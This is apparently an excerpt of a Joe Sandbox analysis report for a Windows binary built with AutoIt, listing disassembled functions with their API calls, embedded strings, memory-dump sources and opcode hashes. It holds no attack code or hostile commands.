                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                              • Opcode ID: a912cdd51e05e1bd3422ba2bab755cc2b6523a44c6cf0cc988e63aadfe60afea
                                                                                                                              • Instruction ID: cc8a4aef6fe38bcdabcccb0929c16e8d497e538a4074a8ca5d85f51346d60550
                                                                                                                              • Opcode Fuzzy Hash: a912cdd51e05e1bd3422ba2bab755cc2b6523a44c6cf0cc988e63aadfe60afea
                                                                                                                              • Instruction Fuzzy Hash: 4C915831508742AFC714EF64D886D6EB7B4AFA9700F004919F99A972A1EB70EE44CB52
                                                                                                                              Function 001CB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001CB4A8
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 001CB5B7
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001CB73A
                                                                                                                                • Part of subcall function 001BA6F6: VariantInit.OLEAUT32(00000000), ref: 001BA736
                                                                                                                                • Part of subcall function 001BA6F6: VariantCopy.OLEAUT32(?,?), ref: 001BA73F
                                                                                                                                • Part of subcall function 001BA6F6: VariantClear.OLEAUT32(?), ref: 001BA74B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                                              • Opcode ID: 6c18350855c3810f8308860e7281f76c4eda899e857e5b7da8260f93657d520e
                                                                                                                              • Instruction ID: 0de31644a01401edf4120da1da88b68388bb034789dc0f9c7d497ab3e824460d
                                                                                                                              • Opcode Fuzzy Hash: 6c18350855c3810f8308860e7281f76c4eda899e857e5b7da8260f93657d520e
                                                                                                                              • Instruction Fuzzy Hash: BD917B746083019FCB10DF24D485E6AB7F5AFA9710F04882DF88ADB362DB31E945CB52
                                                                                                                              Function 001B5D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
                                                                                                                              • _memset.LIBCMT ref: 001B5E56
                                                                                                                              • GetMenuItemInfoW.USER32(?), ref: 001B5E85
                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001B5F31
                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001B5F5B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 4152858687-4108050209
                                                                                                                              • Opcode ID: 6b9c990dd58a483fbb98f20bb68e2fdeeb0ddae1e5483daffbf1f0168f0826d2
                                                                                                                              • Instruction ID: facdc015ed948ea52c72cc96c74cb32b11c5cf026d2ffc2ab78ee5a132b29605
                                                                                                                              • Opcode Fuzzy Hash: 6b9c990dd58a483fbb98f20bb68e2fdeeb0ddae1e5483daffbf1f0168f0826d2
                                                                                                                              • Instruction Fuzzy Hash: FE51CF715187019BD7159B28C845BFBF7AAAF59350F080A2DF895D31E0DB70CE54C792
                                                                                                                              Function 001B1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001B10B8
                                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001B10EE
                                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001B10FF
                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001B1181
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                              • String ID: DllGetClassObject
                                                                                                                              • API String ID: 753597075-1075368562
                                                                                                                              • Opcode ID: 885ea8ef18a9af59478593130bb79ae7d3ec78e5b80958c8576a5213ec78694a
                                                                                                                              • Instruction ID: a922e97a70ebbec3fb86b91a6e528579a8d80e00b7ddd7b8ce954f97b5806fd7
                                                                                                                              • Opcode Fuzzy Hash: 885ea8ef18a9af59478593130bb79ae7d3ec78e5b80958c8576a5213ec78694a
                                                                                                                              • Instruction Fuzzy Hash: 39412AB1600204FFDB15CF68CC94AEA7BAAEF45354F5680A9EE09DF205D7B1D944CBA0
                                                                                                                              Function 001B5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001B5A93
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 001B5AAF
                                                                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001B5AF5
                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002318F0,00000000), ref: 001B5B3E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1173514356-4108050209
                                                                                                                              • Opcode ID: 79f682d5a0bbc5ce1675b7303a53f4cfe6919a2e44a25bfac030e4f73dd284ed
                                                                                                                              • Instruction ID: d4820cb58b1957830e2029c42b05556b23f3deb339d1a6b14c365ac4862d5d12
                                                                                                                              • Opcode Fuzzy Hash: 79f682d5a0bbc5ce1675b7303a53f4cfe6919a2e44a25bfac030e4f73dd284ed
                                                                                                                              • Instruction Fuzzy Hash: 9541C571204701AFDB14DF24D984FAABBEAEF88314F04461DF9A59B2D1D770E840CB62
                                                                                                                              Function 001D0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 001D0478
                                                                                                                                • Part of subcall function 00177F40: _memmove.LIBCMT ref: 00177F8F
                                                                                                                                • Part of subcall function 0017A2FB: _memmove.LIBCMT ref: 0017A33D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$BuffCharLower
                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                              • API String ID: 2411302734-567219261
                                                                                                                              • Opcode ID: f91db6aa3dee00924d916b63c139ba260ea62c65f61648e42c3d512280494d31
                                                                                                                              • Instruction ID: ef247d3c50d295509fb60c38d598295de31249ef34087191c8806c0f0c4050d7
                                                                                                                              • Opcode Fuzzy Hash: f91db6aa3dee00924d916b63c139ba260ea62c65f61648e42c3d512280494d31
                                                                                                                              • Instruction Fuzzy Hash: 6E31B270500619ABCF05EF58D840AEEB3B5FF29310F50862AE866AB3D1DB71EA05CF40
                                                                                                                              Function 001AC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001AC684
                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001AC697
                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 001AC6C7
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 458670788-1403004172
                                                                                                                              • Opcode ID: 7df98ffff18b785fa9c5a00be42c98eb0c4c37bbb6c3cf9d820b5d6273f991f0
                                                                                                                              • Instruction ID: dccae584c1484f37979b514a28c524c4d5f03fd12667fca0326732801d6784be
                                                                                                                              • Opcode Fuzzy Hash: 7df98ffff18b785fa9c5a00be42c98eb0c4c37bbb6c3cf9d820b5d6273f991f0
                                                                                                                              • Instruction Fuzzy Hash: E821F3B5900108BEDB04EBA4DC86DFFB7B9DF26310B108119F42AE72E1DB744D4A9A90
                                                                                                                              Function 001C4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001C4A60
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C4A86
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001C4AB6
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 001C4AFD
                                                                                                                                • Part of subcall function 001C56A9: GetLastError.KERNEL32(?,?,001C4A2B,00000000,00000000,00000001), ref: 001C56BE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1951874230-3916222277
                                                                                                                              • Opcode ID: dd58d903e745346d0d2eafe3f0c0b52202d654ab582746729d242629d8330105
                                                                                                                              • Instruction ID: 03ec38e1491fc2c389404cfc18669f4644e6c5167edbac2450f19e7c10a44365
                                                                                                                              • Opcode Fuzzy Hash: dd58d903e745346d0d2eafe3f0c0b52202d654ab582746729d242629d8330105
                                                                                                                              • Instruction Fuzzy Hash: AE21C9B6544208BFEB21EB649C95FBFB6ADEBA8B48F10011EF106A7140EB60DD459760
                                                                                                                              Function 001738E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001E454E
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • _memset.LIBCMT ref: 00173965
                                                                                                                              • _wcscpy.LIBCMT ref: 001739B5
                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001739C6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                              • String ID: Line:
                                                                                                                              • API String ID: 3942752672-1585850449
                                                                                                                              • Opcode ID: b8cd6a39df4062d8d54aa2cb12fee43e965d8f8c0cadf333c222fd79334bd3c4
                                                                                                                              • Instruction ID: 89f57dcc558f5536b5abf7a9e10590476b5bd6b6e9aef02244653542e88f4081
                                                                                                                              • Opcode Fuzzy Hash: b8cd6a39df4062d8d54aa2cb12fee43e965d8f8c0cadf333c222fd79334bd3c4
                                                                                                                              • Instruction Fuzzy Hash: C931C471118340ABD725EB60DC45BEF77F8AF68314F00851EF69D821A1DB70AA98CB92
                                                                                                                              Function 001D8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
                                                                                                                                • Part of subcall function 0018C619: GetStockObject.GDI32(00000011), ref: 0018C66B
                                                                                                                                • Part of subcall function 0018C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
                                                                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001D8F69
                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 001D8F70
                                                                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001D8F85
                                                                                                                              • DestroyWindow.USER32(?), ref: 001D8F8D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                              • String ID: SysAnimate32
                                                                                                                              • API String ID: 4146253029-1011021900
                                                                                                                              • Opcode ID: f379390435041ee2307dbc386122b8de8e9f1d3cdfd54c94a52736b7b8ac7ed1
                                                                                                                              • Instruction ID: 638642fce4dfad997aaef2b5b78838f060efecc5bf8638aa27a525ae5374a2de
                                                                                                                              • Opcode Fuzzy Hash: f379390435041ee2307dbc386122b8de8e9f1d3cdfd54c94a52736b7b8ac7ed1
                                                                                                                              • Instruction Fuzzy Hash: F1219A71200205BFEF106F64EC84EBF37AAEB59324F10462AFA5497290CB71DC919B60
                                                                                                                              Function 001BE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001BE392
                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 001BE3E6
                                                                                                                              • __swprintf.LIBCMT ref: 001BE3FF
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0020DBF0), ref: 001BE43D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                              • String ID: %lu
                                                                                                                              • API String ID: 3164766367-685833217
                                                                                                                              • Opcode ID: 67fcc1bd7f5e36b51476790ea9a88a2e55342100b56c0b10bcf3802e4b959478
                                                                                                                              • Instruction ID: e4be5e9777690a909f65a3c1101ca4e07c2a63313e3df3caa3a8c6067268c57b
                                                                                                                              • Opcode Fuzzy Hash: 67fcc1bd7f5e36b51476790ea9a88a2e55342100b56c0b10bcf3802e4b959478
                                                                                                                              • Instruction Fuzzy Hash: D6218035A40208AFCB10EFA4DC85EEEBBB9EF99704F108069F509D7292D771DA41CB61
                                                                                                                              Function 001AD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                                • Part of subcall function 001AD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001AD640
                                                                                                                                • Part of subcall function 001AD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 001AD653
                                                                                                                                • Part of subcall function 001AD623: GetCurrentThreadId.KERNEL32 ref: 001AD65A
                                                                                                                                • Part of subcall function 001AD623: AttachThreadInput.USER32(00000000), ref: 001AD661
                                                                                                                              • GetFocus.USER32 ref: 001AD7FB
                                                                                                                                • Part of subcall function 001AD66C: GetParent.USER32(?), ref: 001AD67A
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 001AD844
                                                                                                                              • EnumChildWindows.USER32(?,001AD8BA), ref: 001AD86C
                                                                                                                              • __swprintf.LIBCMT ref: 001AD886
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                              • String ID: %s%d
                                                                                                                              • API String ID: 1941087503-1110647743
                                                                                                                              • Opcode ID: ff72e8288bf514a93b7da21188c1a94549d6589c9fa42a47f923d8e3574b2c44
                                                                                                                              • Instruction ID: 083328fd4aeef18779f368c6068bf4107b17a2957ec6a55099a18752bf7813c7
                                                                                                                              • Opcode Fuzzy Hash: ff72e8288bf514a93b7da21188c1a94549d6589c9fa42a47f923d8e3574b2c44
                                                                                                                              • Instruction Fuzzy Hash: E811A2795002056BDB11BF90AC85FBE3779AB55704F0080B5F90EAA586DB7459458B70
                                                                                                                              Function 001D1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001D18E4
                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001D1917
                                                                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 001D1A3A
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001D1AB0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
